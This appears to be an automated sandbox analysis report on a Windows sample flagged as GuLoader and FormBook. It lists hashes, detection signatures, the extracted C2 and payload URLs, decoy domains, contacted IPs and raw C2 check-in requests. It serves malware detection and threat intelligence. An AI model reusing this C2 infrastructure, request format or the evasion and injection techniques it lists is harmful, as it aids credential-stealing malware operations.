Windows Analysis Report REQUIREMENT.exe

Overview

General Information

Sample Name:	REQUIREMENT.exe
Analysis ID:	1641
MD5:	fb70ff484021669624233d0fbd77ec6a
SHA1:	6820b13631967663ec2637c43c828468633051fd
SHA256:	2b40757a6763aa725d86426ce3cd16fcf1380a9152837d4fbe5e5b085710054c
Infos:
Most interesting Screenshot:

Detection

GuLoader FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Yara detected Generic Dropper

Multi AV Scanner detection for submitted file

Yara detected FormBook

Benign windows process drops PE files

Malicious sample detected (through community Yara rule)

System process connects to network (likely due to code injection or exploit)

GuLoader behavior detected

Multi AV Scanner detection for dropped file

Yara detected GuLoader

Hides threads from debuggers

Sample uses process hollowing technique

Maps a DLL or memory area into another process

Writes to foreign memory regions

Tries to detect Any.run

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Performs DNS queries to domains with low reputation

Self deletion via cmd delete

Injects a PE file into a foreign processes

Queues an APC in another process (thread injection)

Modifies the context of a thread in another process (thread injection)

C2 URLs / IPs found in malware configuration

Tries to steal Mail credentials (via file access)

Tries to harvest and steal browser information (history, passwords, etc)

Uses 32bit PE files

Yara signature match

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

JA3 SSL client fingerprint seen in connection with other malware

Contains functionality to call native functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Connects to many different domains

Contains functionality for execution timing, often used to detect debuggers

Abnormal high CPU Usage

Enables debug privileges

Found inlined nop instructions (likely shell or obfuscated code)

Sample file is different than original file name gathered from version info

Drops PE files

Tries to load missing DLLs

Contains functionality to read the PEB

Checks if the current process is being debugged

Creates a process in suspended mode (likely to inject code)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Signatures

AV Detection:

Found malware configuration

Source: 00000001.00000002.32667545706.00000000023B0000.00000040.00000001.sdmp	Malware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?export=downloa"}
Source: 00000003.00000002.33056187707.000000001E5F0000.00000040.00020000.sdmp	Malware Configuration Extractor: FormBook {"C2 list": ["www.tpmionline.com/cogu/"], "decoy": ["bornhub.xyz", "hancofe.store", "bestofnapa.guide", "innerhell.space", "ryker.ink", "leschoixusa.com", "bqgfk.com", "yakyu-eiga.com", "martialkitchen.com", "thousandoaks-buickgmc.com", "researchlearningspirit.xyz", "byobuzz.com", "taichan.xyz", "ballznutcracker.com", "soymilk-design.com", "chalengestodo.com", "nu12.online", "hkautobox.com", "uprisehealthmonitoring.com", "027jia.net", "cacaolixir.com", "werasdfdfsadf.info", "sanchalanprokashon.com", "donlead.com", "dsnfryfufi.com", "laythproduction.com", "narcozland.com", "jachaljuega.com", "centralcontable.net", "agamottocoin.com", "congtyvhomes.com", "i8news-de.website", "estudio-me.com", "high-clicks.com", "boliden-ab.com", "nazfoodstuff.com", "sozialwirtschaft.team", "xn--4pvw92bcry.com", "6ohmf.info", "fishermandm.com", "marvellouslles.com", "suprabranding.net", "jkwhitleyphotography.com", "qylaser.net", "034455.com", "farbeo.com", "boggbeg.com", "domainair.biz", "gulfweeks.com", "alexanderorlandis.com", "earning-beauty.xyz", "shopsharpgraphics.com", "fdndigtavrcb.net", "ceruleden.com", "originial-motors.com", "ebbtidefloodtide.com", "ctlcloudfr.com", "bywl.top", "alo360.net", "cinargeridonusum.com", "xn--ahindelivery-3mc.com", "cryptoidolz.pro", "snowmanvila.com", "mobileiranian2.com"]}

Multi AV Scanner detection for submitted file

Source: REQUIREMENT.exe

ReversingLabs: Detection: 48%

Yara detected FormBook

Source: Yara match	File source: 00000003.00000002.33056187707.000000001E5F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000000.32994766605.0000000011CAC000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.37532894515.0000000004590000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.33045645431.00000000000A0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.37532501994.0000000004560000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000000.32944159535.0000000011CAC000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.37528295705.00000000027D0000.00000040.00020000.sdmp, type: MEMORY

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\Aidr0p8lx\certmgr3ff.exe

ReversingLabs: Detection: 48%

Compliance:

Uses 32bit PE files

Source: REQUIREMENT.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: unknown	HTTPS traffic detected: 172.217.168.46:443 -> 192.168.11.20:49790 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.185.161:443 -> 192.168.11.20:49791 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.168.46:443 -> 192.168.11.20:49824 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.168.33:443 -> 192.168.11.20:49825 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.168.78:443 -> 192.168.11.20:49826 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.168.46:443 -> 192.168.11.20:49829 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.168.33:443 -> 192.168.11.20:49830 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.168.46:443 -> 192.168.11.20:49831 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.168.33:443 -> 192.168.11.20:49832 version: TLS 1.2

Source:	Binary string: systray.pdb source: REQUIREMENT.exe, 00000003.00000002.33047271882.0000000000997000.00000004.00000020.sdmp
Source:	Binary string: systray.pdbGCTL source: REQUIREMENT.exe, 00000003.00000002.33047271882.0000000000997000.00000004.00000020.sdmp
Source:	Binary string: wntdll.pdbUGP source: REQUIREMENT.exe, 00000003.00000002.33058899963.000000001EA8D000.00000040.00000001.sdmp, systray.exe, 0000000D.00000002.37536543338.0000000004A8D000.00000040.00000001.sdmp, certmgr3ff.exe, 0000001A.00000002.35658181746.000000001E950000.00000040.00000001.sdmp, certmgr3ff.exe, 0000001B.00000002.35788695940.000000001EA8D000.00000040.00000001.sdmp, certmgr3ff.exe, 0000001C.00000002.35829603529.000000001EA7D000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: certmgr3ff.exe

Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_027DFA80 FindFirstFileW,FindNextFileW,FindClose,		13_2_027DFA80
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_027DFA79 FindFirstFileW,FindNextFileW,FindClose,		13_2_027DFA79

Software Vulnerabilities:

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Windows\SysWOW64\systray.exe	Code function: 4x nop then pop edi	13_2_027E62B9
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4x nop then pop edi	13_2_027E5674
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4x nop then pop ebx	13_2_027D6AB8

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49793 -> 51.77.52.109:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49793 -> 51.77.52.109:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49793 -> 51.77.52.109:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49795 -> 172.67.139.41:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49795 -> 172.67.139.41:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49795 -> 172.67.139.41:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49796 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49796 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49796 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49805 -> 216.189.108.75:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49805 -> 216.189.108.75:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49805 -> 216.189.108.75:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49807 -> 15.197.150.5:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49807 -> 15.197.150.5:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49807 -> 15.197.150.5:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49808 -> 198.54.117.211:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49808 -> 198.54.117.211:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49808 -> 198.54.117.211:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49809 -> 142.250.186.179:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49809 -> 142.250.186.179:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49809 -> 142.250.186.179:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49820 -> 216.189.108.75:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49820 -> 216.189.108.75:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49820 -> 216.189.108.75:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49841 -> 172.67.139.41:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49841 -> 172.67.139.41:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49841 -> 172.67.139.41:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49858 -> 216.189.108.75:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49858 -> 216.189.108.75:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49858 -> 216.189.108.75:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49863 -> 137.117.17.70:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49863 -> 137.117.17.70:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49863 -> 137.117.17.70:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49864 -> 192.0.78.25:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49864 -> 192.0.78.25:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49864 -> 192.0.78.25:80

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 47.88.32.85 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 199.101.245.90 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 185.73.226.109 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 156.67.72.176 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 192.64.116.180 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 172.67.139.41 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 75.2.115.196 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 103.164.172.49 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 156.239.224.4 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 142.250.186.179 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 51.77.52.109 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 204.141.43.204 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 91.195.240.94 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 15.197.150.5 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 3.121.211.190 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 151.101.192.119 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 154.215.231.81 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 137.117.17.70 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 192.0.78.25 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 198.59.144.16 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 66.96.130.148 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 34.102.136.180 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 198.54.117.210 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 198.54.117.211 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 199.34.228.191 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 216.189.108.75 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 154.195.206.5 80	Jump to behavior

Performs DNS queries to domains with low reputation

Source:	DNS query: www.taichan.xyz
Source:	DNS query: www.researchlearningspirit.xyz

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: https://drive.google.com/uc?export=downloa
Source: Malware configuration extractor	URLs: www.tpmionline.com/cogu/

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /cogu/?E6=XfIccXNfLX5VXF4pbqJOgkj9hfbfozamY6uAUfQ6uaB911jdIVb8IPx0hpo8MPsnFfll&EVpdF=D6AlWhC HTTP/1.1Host: www.hkautobox.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=A+BqLwYGva59ha/kPE6YS9y5Cw6+WAl2lefwiAx9zEuoRfqY6i5KVFoFLUK0YMYmgzYy&EVpdF=D6AlWhC HTTP/1.1Host: www.taichan.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=xC5KNdI4GHSouGT38hjr4jsIQYnK9JeLhI8DzyfFb/cxQtVLaTUcvP9pEn5hYvrjmrvn&EVpdF=D6AlWhC HTTP/1.1Host: www.researchlearningspirit.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=0YOc4eMaPzOzEkITDzffiHUHUfLmwWJQOjcrghoXxwbMleRPqH/xhR7l6RpoJjhKUSQ4&EVpdF=D6AlWhC HTTP/1.1Host: www.bestofnapa.guideConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=Esy+SZGnlGcFL3b4TdwIqkWYMoe5TN9PO2uJWgi8huQtR8iqs12O2F0FkbqpOK+vLGht&EVpdF=D6AlWhC HTTP/1.1Host: www.bqgfk.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=7eaza+Vm8yYemsyz/zzwjWrklc8Yi5Ho5HX5TNM7allR4urhJrmRG4YV/48q0bSefO77&EVpdF=D6AlWhC HTTP/1.1Host: www.centralcontable.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=RrpHjQu0LYHaKA/4jQL7YSE8Zlpf0+V6RMywmZjWIXP7087B5zoOXLZv/c2UnXWK/cWX&EVpdF=D6AlWhC HTTP/1.1Host: www.mobileiranian2.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=AKrVC46g6aUqOUl59QNJifV5z+OjBVKueGdcTrEcNhmNt+uKBfQ1nRhJazzsjvYBoCEF&EVpdF=D6AlWhC HTTP/1.1Host: www.soymilk-design.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=XUO191KcVQfEEWsMJ9UBYnlCa/I+dhdLiWjITA58DRbwOP6fYUmdo8NYhzdUy3C+FUJf&EVpdF=D6AlWhC HTTP/1.1Host: www.domainair.bizConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=NkcQ3oDOYkJGNuF95ZpkIKht5W0ulo+Ok2Me3lTyYaTuJ86BWuzspf8yVeXKwyiufl+B&EVpdF=D6AlWhC HTTP/1.1Host: www.nazfoodstuff.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=TP9OdDgalUD062Nc3ik6VEBCj7pU3sm2O2OGxDUNHqL9P8Ry/BX8xz+WUeumcOFdCH3f&EVpdF=D6AlWhC HTTP/1.1Host: www.cacaolixir.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=Vt5Qt2OmygQqgSlUs1LnTjIm5PAf0+j+U7GfZi7PpDW7/xLcDx4cEzk7U78MhAa3f93Z&EVpdF=D6AlWhC HTTP/1.1Host: www.fishermandm.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=Q5540RkvIutfUkv4jGh7NesFHfEn9TtJOrndmKD2I8/SlFrfn/DKKL7940R4DTj3bJkH&EVpdF=D6AlWhC HTTP/1.1Host: www.tpmionline.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=87aM8EhKbioxWIlC6s4JEYcLDNdjlliEZPCwIIW3J1beA80Hn/9mg1w4n0mGUY+KwtTo&EVpdF=D6AlWhC HTTP/1.1Host: www.shopsharpgraphics.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?-Z=5j3dv6rhizRPl0MP&E6=0JW80yNTUiIblQnhj6MVn32XupSCHJgGKr7CbJ8acIuUK/cVpV73gH6OM/JKXthPyqu2 HTTP/1.1Host: www.jkwhitleyphotography.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=S26i6wvHPThQg5EmN96E/uV1flc9kx0qaETcxJTPPIRiBsvCj8OwSBVU0bghLZ2zBTNI&-Z=5j3dv6rhizRPl0MP HTTP/1.1Host: www.boliden-ab.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?-Z=5j3dv6rhizRPl0MP&E6=nujE8SKobpMEhFJCVnGir4WeRJmwvtVIfZaGtibw0wWMPhuUS2YahDL2LgFihEH5PyEZ HTTP/1.1Host: www.jachaljuega.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=62eHCTnViIbE5q/Vnkbvlz9TsuOUnGzf3IBPc1eKYkVqg+lXJUtXLjRsX48ZiFT924q+&-Z=5j3dv6rhizRPl0MP HTTP/1.1Host: www.xn--4pvw92bcry.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?-Z=5j3dv6rhizRPl0MP&E6=xvNBpPJxoT3V4STjWu+oXBc4W2+zox4LkJxyAqr5flGYxwgg6ZSnpz45f2Sl431JRkcr HTTP/1.1Host: www.ceruleden.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=7eaza+Vm8yYemsyz/zzwjWrklc8Yi5Ho5HX5TNM7allR4urhJrmRG4YV/48q0bSefO77&-Z=5j3dv6rhizRPl0MP HTTP/1.1Host: www.centralcontable.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?-Z=5j3dv6rhizRPl0MP&E6=jcFOH/ZxkSx2B+eOzji128R7cFyPyE6Tynf2GelbWKAhzBX6sEIR/9TLWk4pwFmf1t+F HTTP/1.1Host: www.marvellouslles.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=XUO191KcVQfEEWsMJ9UBYnlCa/I+dhdLiWjITA58DRbwOP6fYUmdo8NYhzdUy3C+FUJf&EVpdF=D6AlWhC HTTP/1.1Host: www.domainair.bizConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=NkcQ3oDOYkJGNuF95ZpkIKht5W0ulo+Ok2Me3lTyYaTuJ86BWuzspf8yVeXKwyiufl+B&EVpdF=D6AlWhC HTTP/1.1Host: www.nazfoodstuff.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=TP9OdDgalUD062Nc3ik6VEBCj7pU3sm2O2OGxDUNHqL9P8Ry/BX8xz+WUeumcOFdCH3f&EVpdF=D6AlWhC HTTP/1.1Host: www.cacaolixir.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=Vt5Qt2OmygQqgSlUs1LnTjIm5PAf0+j+U7GfZi7PpDW7/xLcDx4cEzk7U78MhAa3f93Z&EVpdF=D6AlWhC HTTP/1.1Host: www.fishermandm.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=kZBNmvv9/eiuWktgT/6kcZDtJw48mlhVfm1ri0sSAffAJ4dIxBHSptGOKbrWsOvy+Lqt&EVpdF=D6AlWhC HTTP/1.1Host: www.high-clicks.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=Q5540RkvIutfUkv4jGh7NesFHfEn9TtJOrndmKD2I8/SlFrfn/DKKL7940R4DTj3bJkH&EVpdF=D6AlWhC HTTP/1.1Host: www.tpmionline.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=87aM8EhKbioxWIlC6s4JEYcLDNdjlliEZPCwIIW3J1beA80Hn/9mg1w4n0mGUY+KwtTo&EVpdF=D6AlWhC HTTP/1.1Host: www.shopsharpgraphics.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=ryReQ6gKjI02p+tUx8m+7gLTns0HXWXot/Pd7vxfolZ67qcT6NKb85r0SsRZkPEm7LMW&GJE=6lTPJF HTTP/1.1Host: www.alo360.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=ryReQ6gKjI02p+tUx8m+7gLTns0HXWXot/Pd7vxfolZ67qcT6NKb85r0SsRZkPEm7LMW&GJE=6lTPJF HTTP/1.1Host: www.alo360.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=QRnHbABZr1ah6x+kOaYWzzpt/wEyN1uu/6itxi1XZlZPOwHQf3Tea8RViivUAbn0Nq3Q&GJE=6lTPJF HTTP/1.1Host: www.nu12.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=xC5KNdI4GHSouGT38hjr4jsIQYnK9JeLhI8DzyfFb/cxQtVLaTUcvP9pEn5hYvrjmrvn&GJE=6lTPJF HTTP/1.1Host: www.researchlearningspirit.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=62eHCTnViIbE5q/Vnkbvlz9TsuOUnGzf3IBPc1eKYkVqg+lXJUtXLjRsX48ZiFT924q+&GJE=6lTPJF HTTP/1.1Host: www.xn--4pvw92bcry.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=YWc9mILWetVQGhipA+G2uDb+SeX0Cd/MjDmv0ZQMTg5SMMvYjLI+xM6WaOuTEiNNd0Xk&GJE=6lTPJF HTTP/1.1Host: www.cinargeridonusum.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=XUO191KcVQfEEWsMJ9UBYnlCa/I+dhdLiWjITA58DRbwOP6fYUmdo8NYhzdUy3C+FUJf&EVpdF=D6AlWhC HTTP/1.1Host: www.domainair.bizConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=NkcQ3oDOYkJGNuF95ZpkIKht5W0ulo+Ok2Me3lTyYaTuJ86BWuzspf8yVeXKwyiufl+B&EVpdF=D6AlWhC HTTP/1.1Host: www.nazfoodstuff.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=TP9OdDgalUD062Nc3ik6VEBCj7pU3sm2O2OGxDUNHqL9P8Ry/BX8xz+WUeumcOFdCH3f&EVpdF=D6AlWhC HTTP/1.1Host: www.cacaolixir.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=Vt5Qt2OmygQqgSlUs1LnTjIm5PAf0+j+U7GfZi7PpDW7/xLcDx4cEzk7U78MhAa3f93Z&EVpdF=D6AlWhC HTTP/1.1Host: www.fishermandm.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=kZBNmvv9/eiuWktgT/6kcZDtJw48mlhVfm1ri0sSAffAJ4dIxBHSptGOKbrWsOvy+Lqt&EVpdF=D6AlWhC HTTP/1.1Host: www.high-clicks.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=Q5540RkvIutfUkv4jGh7NesFHfEn9TtJOrndmKD2I8/SlFrfn/DKKL7940R4DTj3bJkH&EVpdF=D6AlWhC HTTP/1.1Host: www.tpmionline.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=87aM8EhKbioxWIlC6s4JEYcLDNdjlliEZPCwIIW3J1beA80Hn/9mg1w4n0mGUY+KwtTo&EVpdF=D6AlWhC HTTP/1.1Host: www.shopsharpgraphics.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=87aM8EhKbioxWIlC6s4JEYcLDNdjlliEZPCwIIW3J1beA80Hn/9mg1w4n0mGUY+KwtTo&JXeD0V=5jFpKDWXi HTTP/1.1Host: www.shopsharpgraphics.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=NFedTnOwyfQnQfz4Fa359HV39V5qjz9UUQouYpwkrhdO9l9uPa/7UwpxNrVjVYhaXz3f&JXeD0V=5jFpKDWXi HTTP/1.1Host: www.uprisehealthmonitoring.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=L5GjM02Qi9/3ctzLfpX21kbqInICP/PmVfQkFp534KYMBhdy6kz6hr7HyPkdH1b6OtPy&JXeD0V=5jFpKDWXi HTTP/1.1Host: www.estudio-me.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
